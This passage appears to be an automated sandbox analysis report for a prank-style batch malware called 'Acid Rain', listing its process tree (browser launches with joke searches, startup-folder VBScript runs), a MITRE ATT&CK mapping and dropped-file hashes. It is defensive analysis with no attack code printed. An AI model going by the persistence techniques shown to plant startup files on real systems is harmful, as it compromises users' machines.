                                                                                                  5⤵
                                                                                                    PID:4740
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=mcafee+vs+avast
                                                                                                  4⤵
                                                                                                    PID:3036
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
                                                                                                      5⤵
                                                                                                        PID:1072
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=smudge+the+cat
                                                                                                      4⤵
                                                                                                        PID:960
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
                                                                                                          5⤵
                                                                                                            PID:2732
                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                          Timeout 5
                                                                                                          4⤵
                                                                                                          • Delays execution with timeout.exe
                                                                                                          PID:2464
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+make+your+own+rickroll
                                                                                                          4⤵
                                                                                                            PID:4704
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
                                                                                                              5⤵
                                                                                                                PID:1072
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.thisworldthesedays.com/how-to-remove-acid-rainexe-step-by-step-guide.html
                                                                                                              4⤵
                                                                                                                PID:1380
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
                                                                                                                  5⤵
                                                                                                                    PID:3684
                                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n0rt0nant1ldks.vbs"
                                                                                                                  4⤵
                                                                                                                    PID:4672
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=is+safe+deleting+system32F
                                                                                                                    4⤵
                                                                                                                      PID:4704
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
                                                                                                                        5⤵
                                                                                                                          PID:3704
                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                        Timeout 5
                                                                                                                        4⤵
                                                                                                                        • Delays execution with timeout.exe
                                                                                                                        PID:960
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://drive.google.com/file/d/1TMp5UbzwcHprY7PhC9g58KsCN9EZVdBV/view
                                                                                                                        4⤵
                                                                                                                          PID:5316
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
                                                                                                                            5⤵
                                                                                                                              PID:5328
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+make+a+ransomware+in+batch
                                                                                                                            4⤵
                                                                                                                              PID:5372
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
                                                                                                                                5⤵
                                                                                                                                  PID:5392
                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                Timeout 5
                                                                                                                                4⤵
                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                PID:5532
                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hifjdnfejfnejnkdpamzm.vbs"
                                                                                                                                4⤵
                                                                                                                                  PID:5688
                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                  Timeout 55
                                                                                                                                  4⤵
                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                  PID:5700
                                                                                                                          • C:\Windows\system32\taskmgr.exe
                                                                                                                            "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                            1⤵
                                                                                                                            • Drops startup file
                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                            PID:4180
                                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:3660
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
                                                                                                                              1⤵
                                                                                                                                PID:4208
                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:5272
                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                  "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.Search_cw5n1h2txyewy
                                                                                                                                  1⤵
                                                                                                                                    PID:3892
                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                    C:\Windows\System32\svchost.exe -k UnistackSvcGroup
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:1076
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                    1⤵
                                                                                                                                    • Enumerates system info in registry
                                                                                                                                    • Modifies registry class
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:2388

                                                                                                                                  Network

                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                  Initial Access

                                                                                                                                  Replication Through Removable Media

                                                                                                                                  1
                                                                                                                                  T1091

                                                                                                                                  Execution

                                                                                                                                  Scheduled Task

                                                                                                                                  1
                                                                                                                                  T1053

                                                                                                                                  Persistence

                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                  1
                                                                                                                                  T1060

                                                                                                                                  Bootkit

                                                                                                                                  1
                                                                                                                                  T1067

                                                                                                                                  Scheduled Task

                                                                                                                                  1
                                                                                                                                  T1053

                                                                                                                                  Privilege Escalation

                                                                                                                                  Scheduled Task

                                                                                                                                  1
                                                                                                                                  T1053

                                                                                                                                  Defense Evasion

                                                                                                                                  Modify Registry

                                                                                                                                  2
                                                                                                                                  T1112

                                                                                                                                  Credential Access

                                                                                                                                  Credentials in Files

                                                                                                                                  1
                                                                                                                                  T1081

                                                                                                                                  Discovery

                                                                                                                                  Query Registry

                                                                                                                                  3
                                                                                                                                  T1012

                                                                                                                                  System Information Discovery

                                                                                                                                  4
                                                                                                                                  T1082

                                                                                                                                  Peripheral Device Discovery

                                                                                                                                  1
                                                                                                                                  T1120

                                                                                                                                  Lateral Movement

                                                                                                                                  Replication Through Removable Media

                                                                                                                                  1
                                                                                                                                  T1091

                                                                                                                                  Collection

                                                                                                                                  Data from Local System

                                                                                                                                  1
                                                                                                                                  T1005

                                                                                                                                  Command and Control

                                                                                                                                  Web Service

                                                                                                                                  1
                                                                                                                                  T1102

                                                                                                                                  Replay Monitor

                                                                                                                                  Loading Replay Monitor...

                                                                                                                                  Downloads

                                                                                                                                  • C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\SETUPM~1\202209~1.PMA
                                                                                                                                    Filesize

                                                                                                                                    1KB

                                                                                                                                    MD5

                                                                                                                                    c04318faf0c800948603459b8a0f522e

                                                                                                                                    SHA1

                                                                                                                                    3aec68ec0dd3240ef6064a191875cd6aa8568ec5

                                                                                                                                    SHA256

                                                                                                                                    6335b24f5b264200c8f86a1351582f148ad4b6c253cc0430c01ac60112df81d7

                                                                                                                                    SHA512

                                                                                                                                    ff781d19280f918d3dc537963bbaf977afa149325c700f87c1f89b37b4a9982faae74b8062928aa67eb94cc72778e36b53468674ef05fd63802d280a11def64d

                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\msedge_elf.dll
                                                                                                                                    Filesize

                                                                                                                                    1.2MB

                                                                                                                                    MD5

                                                                                                                                    d2bddb1b48b3c5d0d35479662eab0f59

                                                                                                                                    SHA1

                                                                                                                                    62cfed69a68edbb156ce45e7425859ecf7d594a5

                                                                                                                                    SHA256

                                                                                                                                    9a7486d838a4ea36a4287593042cb16265fe1c6cb3baf8c1b5aa5e319df5f081

                                                                                                                                    SHA512

                                                                                                                                    44fde54e4b00dc2636c152d66928e3d2872e71e14ae733e18489950c1401cbfbd1fa8c69752b920167a7839e670b28137daaa4d9231fd789b6c3c78f20ee8f29

                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    Filesize

                                                                                                                                    3.2MB

                                                                                                                                    MD5

                                                                                                                                    ad8536c7440638d40156e883ac25086e

                                                                                                                                    SHA1

                                                                                                                                    fa9e8b7fb10473a01b8925c4c5b0888924a1147c

                                                                                                                                    SHA256

                                                                                                                                    73d84d249f16b943d1d3f9dd9e516fadd323e70939c29b4a640693eb8818ee9a

                                                                                                                                    SHA512

                                                                                                                                    b5f368be8853aa142dba614dcca7e021aba92b337fe36cfc186714092a4dab1c7a2181954cd737923edd351149980182a090dbde91081c81d83f471ff18888fe

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                    Filesize

                                                                                                                                    152B

                                                                                                                                    MD5

                                                                                                                                    962644599f0c746e1b17a064c670d314

                                                                                                                                    SHA1

                                                                                                                                    73ccfa471325f9fe38767edab76fa81e95565eed

                                                                                                                                    SHA256

                                                                                                                                    12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

                                                                                                                                    SHA512

                                                                                                                                    cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                    Filesize

                                                                                                                                    152B

                                                                                                                                    MD5

                                                                                                                                    962644599f0c746e1b17a064c670d314

                                                                                                                                    SHA1

                                                                                                                                    73ccfa471325f9fe38767edab76fa81e95565eed

                                                                                                                                    SHA256

                                                                                                                                    12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

                                                                                                                                    SHA512

                                                                                                                                    cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                    Filesize

                                                                                                                                    152B

                                                                                                                                    MD5

                                                                                                                                    962644599f0c746e1b17a064c670d314

                                                                                                                                    SHA1

                                                                                                                                    73ccfa471325f9fe38767edab76fa81e95565eed

                                                                                                                                    SHA256

                                                                                                                                    12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

                                                                                                                                    SHA512

                                                                                                                                    cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                    Filesize

                                                                                                                                    152B

                                                                                                                                    MD5

                                                                                                                                    962644599f0c746e1b17a064c670d314

                                                                                                                                    SHA1

                                                                                                                                    73ccfa471325f9fe38767edab76fa81e95565eed

                                                                                                                                    SHA256

                                                                                                                                    12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

                                                                                                                                    SHA512

                                                                                                                                    cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                    Filesize

                                                                                                                                    152B

                                                                                                                                    MD5

                                                                                                                                    962644599f0c746e1b17a064c670d314

                                                                                                                                    SHA1

                                                                                                                                    73ccfa471325f9fe38767edab76fa81e95565eed

                                                                                                                                    SHA256

                                                                                                                                    12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

                                                                                                                                    SHA512

                                                                                                                                    cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                    Filesize

                                                                                                                                    152B

                                                                                                                                    MD5

                                                                                                                                    962644599f0c746e1b17a064c670d314

                                                                                                                                    SHA1

                                                                                                                                    73ccfa471325f9fe38767edab76fa81e95565eed

                                                                                                                                    SHA256

                                                                                                                                    12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

                                                                                                                                    SHA512

                                                                                                                                    cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                    Filesize

                                                                                                                                    152B

                                                                                                                                    MD5

                                                                                                                                    962644599f0c746e1b17a064c670d314

                                                                                                                                    SHA1

                                                                                                                                    73ccfa471325f9fe38767edab76fa81e95565eed

                                                                                                                                    SHA256

                                                                                                                                    12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

                                                                                                                                    SHA512

                                                                                                                                    cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                    Filesize

                                                                                                                                    152B

                                                                                                                                    MD5

                                                                                                                                    962644599f0c746e1b17a064c670d314

                                                                                                                                    SHA1

                                                                                                                                    73ccfa471325f9fe38767edab76fa81e95565eed

                                                                                                                                    SHA256

                                                                                                                                    12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

                                                                                                                                    SHA512

                                                                                                                                    cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                    Filesize

                                                                                                                                    152B

                                                                                                                                    MD5

                                                                                                                                    962644599f0c746e1b17a064c670d314

                                                                                                                                    SHA1

                                                                                                                                    73ccfa471325f9fe38767edab76fa81e95565eed

                                                                                                                                    SHA256

                                                                                                                                    12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

                                                                                                                                    SHA512

                                                                                                                                    cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                    Filesize

                                                                                                                                    152B

                                                                                                                                    MD5

                                                                                                                                    962644599f0c746e1b17a064c670d314

                                                                                                                                    SHA1

                                                                                                                                    73ccfa471325f9fe38767edab76fa81e95565eed

                                                                                                                                    SHA256

                                                                                                                                    12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

                                                                                                                                    SHA512

                                                                                                                                    cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                    Filesize

                                                                                                                                    152B

                                                                                                                                    MD5

                                                                                                                                    962644599f0c746e1b17a064c670d314

                                                                                                                                    SHA1

                                                                                                                                    73ccfa471325f9fe38767edab76fa81e95565eed

                                                                                                                                    SHA256

                                                                                                                                    12a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966

                                                                                                                                    SHA512

                                                                                                                                    cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\4CB8.tmp\Acid Rain.bat
                                                                                                                                    Filesize

                                                                                                                                    6KB

                                                                                                                                    MD5

                                                                                                                                    16a6fe0a61c21d85803c2b8383d5d3c2

                                                                                                                                    SHA1

                                                                                                                                    fec9adfac8c278c3dc548989a97c574ccdcb0934

                                                                                                                                    SHA256

                                                                                                                                    1942dd34f70465202360d5f299e7160cea4d108ac4305a94dbabd9b97f4b7bd0

                                                                                                                                    SHA512

                                                                                                                                    6dd03c5c69caf470584153e5e91ae074868e3002dcc76a07e1782c8d23fa8f309c09b0a50b787606be958f051ef0fdb67d24d0c91eee261549d6d60b857ce061

                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe
                                                                                                                                    Filesize

                                                                                                                                    80KB

                                                                                                                                    MD5

                                                                                                                                    b3904e987387ac3ff87b2d16e3e28156

                                                                                                                                    SHA1

                                                                                                                                    d575167f14fc84625b1525e8a0dfa27c514b1357

                                                                                                                                    SHA256

                                                                                                                                    143bb189902ec44987f475f6fce4c0f90c072e5d732dae58b5f79a3c31b5f584

                                                                                                                                    SHA512

                                                                                                                                    a105063b598555d2b4c1a3950a7ac120ffc72ad362e6c76a364b48ff8c32e8daea48ef362b22aa62d848af1c20d3ef7c6536e717e874c6fad329ec0c22e9268f

                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe
                                                                                                                                    Filesize

                                                                                                                                    80KB

                                                                                                                                    MD5

                                                                                                                                    b3904e987387ac3ff87b2d16e3e28156

                                                                                                                                    SHA1

                                                                                                                                    d575167f14fc84625b1525e8a0dfa27c514b1357

                                                                                                                                    SHA256

                                                                                                                                    143bb189902ec44987f475f6fce4c0f90c072e5d732dae58b5f79a3c31b5f584

                                                                                                                                    SHA512

                                                                                                                                    a105063b598555d2b4c1a3950a7ac120ffc72ad362e6c76a364b48ff8c32e8daea48ef362b22aa62d848af1c20d3ef7c6536e717e874c6fad329ec0c22e9268f

                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe
                                                                                                                                    Filesize

                                                                                                                                    101KB

                                                                                                                                    MD5

                                                                                                                                    aacce8318a2e5f0a43c8cd50907d6d29

                                                                                                                                    SHA1

                                                                                                                                    fd5da11bbbcdb2421186626f461cb48fc634760c

                                                                                                                                    SHA256

                                                                                                                                    7217260d8d9c6b0b6c8b797f64c516d8ebe4db48dc8a5fced46eab9082378724

                                                                                                                                    SHA512

                                                                                                                                    8991368b7e5391b37c4584eedddfbb4041ddc554acad9742b390aad7b5b4791c106d1068b7c9c29cda9e14bd62e5c36894318246c247576162c54f30076190b5

                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe
                                                                                                                                    Filesize

                                                                                                                                    101KB

                                                                                                                                    MD5

                                                                                                                                    aacce8318a2e5f0a43c8cd50907d6d29

                                                                                                                                    SHA1

                                                                                                                                    fd5da11bbbcdb2421186626f461cb48fc634760c

                                                                                                                                    SHA256

                                                                                                                                    7217260d8d9c6b0b6c8b797f64c516d8ebe4db48dc8a5fced46eab9082378724

                                                                                                                                    SHA512

                                                                                                                                    8991368b7e5391b37c4584eedddfbb4041ddc554acad9742b390aad7b5b4791c106d1068b7c9c29cda9e14bd62e5c36894318246c247576162c54f30076190b5

                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hifjdnfejfnejnkdpamzm.vbs
                                                                                                                                    Filesize

                                                                                                                                    60B

                                                                                                                                    MD5

                                                                                                                                    70b06bab45636ed2ce89ffa1a56a2eda

                                                                                                                                    SHA1

                                                                                                                                    781043fb2a866fc38233be0b8beccd7fbeb0513d

                                                                                                                                    SHA256

                                                                                                                                    a9644355bc115a7a8fce8603643254f8061cce0e1af9db037b2bda9ca62f4fff

                                                                                                                                    SHA512

                                                                                                                                    a8a3d984b253e83c6ab4c4ad9b6ba773f69166204649be63d6850136523861e42132411d1fce3a83c4408f8051413101f5835136cecfad2b8022cc3489f004aa

                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n0rt0nant1ldks.vbs
                                                                                                                                    Filesize

                                                                                                                                    113B

                                                                                                                                    MD5

                                                                                                                                    076eec2d750fb2a85461d8b227b96124

                                                                                                                                    SHA1

                                                                                                                                    d1a6638bc96e6e3adf0ca3e3cb4c846f77e365d8

                                                                                                                                    SHA256

                                                                                                                                    a596e5753416572e877fe630002dc42afdbfa9ca80473e1385017b37e082a1a4

                                                                                                                                    SHA512

                                                                                                                                    5c6ff87335577061483cbf79333728085f198a4ee56fabab7d2fc401cbe8b146ee5ad174a6c1f5ba02095b186bb0f3729a5927b7fda4feeb6f5ae7411fa70ab5

                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sodnciwkms.vbs
                                                                                                                                    Filesize

                                                                                                                                    84B

                                                                                                                                    MD5

                                                                                                                                    139b5edf5ba8a4aa768281a29cac1649

                                                                                                                                    SHA1

                                                                                                                                    da8a2d689695a749288f161032e1f042122e89d5

                                                                                                                                    SHA256

                                                                                                                                    1dd686325c7471a59a43142c6d7dec01047b3e95147254b235fbc3652f923a7c

                                                                                                                                    SHA512

                                                                                                                                    ebf47fe1de3dca337a891330e7a97fbcf6c899a212be1c07f666d8d1179f116a70b4fcc66accfff3e3942ec83c79170882c8d48019feee0a02ffb57f66e61af8

                                                                                                                                  • C:\Windows\Debug\WIA\wiatrace.log
                                                                                                                                    Filesize

                                                                                                                                    1KB

                                                                                                                                    MD5

                                                                                                                                    06860547265933eb764e501f800fc612

                                                                                                                                    SHA1

                                                                                                                                    14953818abb171fd02938f7ee716599136bfc9b3

                                                                                                                                    SHA256

                                                                                                                                    097c456b0230fb248927161e10d62b7688f1730f58fed5f0d8b4ada37dc0bebb

                                                                                                                                    SHA512

                                                                                                                                    225fbc8ca3de89d8a6a8c10f1f8d13bc995a1675ce7f1af3adc1d010981d5c2e45fdc44d4742261375d503525cd93e7ed39820c9dec0344d70d1d9a3566f3f50

                                                                                                                                  • \??\pipe\LOCAL\crashpad_616_SHMJYVKGXGYTZGJU
                                                                                                                                    MD5

                                                                                                                                    d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                    SHA1

                                                                                                                                    da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                    SHA256

                                                                                                                                    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                    SHA512

